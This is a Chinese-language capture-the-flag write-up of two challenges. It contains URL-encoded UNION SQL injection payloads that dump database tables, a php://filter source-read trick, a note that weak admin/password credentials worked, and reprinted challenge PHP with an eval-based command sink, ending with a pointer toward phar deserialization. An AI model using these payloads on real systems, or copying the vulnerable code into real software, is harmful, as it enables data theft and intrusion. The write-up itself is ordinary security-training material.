[b01lers2020]Life on Mars
burp抓包,发现有参数,尝试一下sql注入,发现为数字型注入,使用union联合注入,字段数为2,并且回显在最后一个位置
接下来就开始
amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='aliens'--+
|
发现表都是一样的,感觉有点奇怪,于是再回去看看有没有其他库,但是确实只有一个库,看了一下wp发现是要用sqlmap跑一下,有一个code库
然后手工注入一下:
search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code--+
|
[GXYCTF2019]BabysqliV3.0
查看源码,发现一个Unicode,解码以后是一个
一开始没反应过来,后来想想,它的意思应该是提示这是一个弱口令
跑了一下发现admin/password可以登录
登陆以后发现有文件包含,用伪协议尝试读一下源码试试看
?file=php://filter/read=convert.base64-encode/resource=home
|
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
if(isset($_GET['file'])){
if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
die("hacker!");
}
else{
if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
$file = $_GET['file'].".php";
}
else{
$file = $_GET['file'].".fxxkyou!";
}
echo "å½åå¼ç¨çæ¯ ".$file;
require $file;
}
}
else{
die("no permission!");
}
}
?>
|
根据过滤内容,应该是有一个名为flag的文件夹存储着flag
再来读一下upload.php的文件内0容
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<form action="" method="post" enctype="multipart/form-data">
ä¸ä¼ æ件
<input type="file" name="file" />
<input type="submit" name="submit" value="ä¸ä¼ " />
</form>
<?php
error_reporting(0);
class Uploader{
public $Filename;
public $cmd;
public $token;
function __construct(){
$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$ext = ".txt";
@mkdir($sandbox, 0777, true);
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
else{
$this->Filename = $sandbox.$_SESSION['user'].$ext;
}
$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
$this->token = $_SESSION['user'];
}
function upload($file){
global $sandbox;
global $ext;
if(preg_match("[^a-z0-9]", $this->Filename)){
$this->cmd = "die('illegal filename!');";
}
else{
if($file['size'] > 1024){
$this->cmd = "die('you are too big (â²â½`ã)');";
}
else{
$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
}
}
}
function __toString(){
global $sandbox;
global $ext;
return $this->Filename;
}
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
}
if(isset($_FILES['file'])) {
$uploader = new Uploader();
$uploader->upload($_FILES["file"]);
if(@file_get_contents($uploader)){
echo "ä¸é¢æ¯ä½ ä¸ä¼ çæ件ï¼<br>".$uploader."<br>";
echo file_get_contents($uploader);
}
}
?>
|
文件+序列化,并且没有反序列化的点,那么就是phar反序列化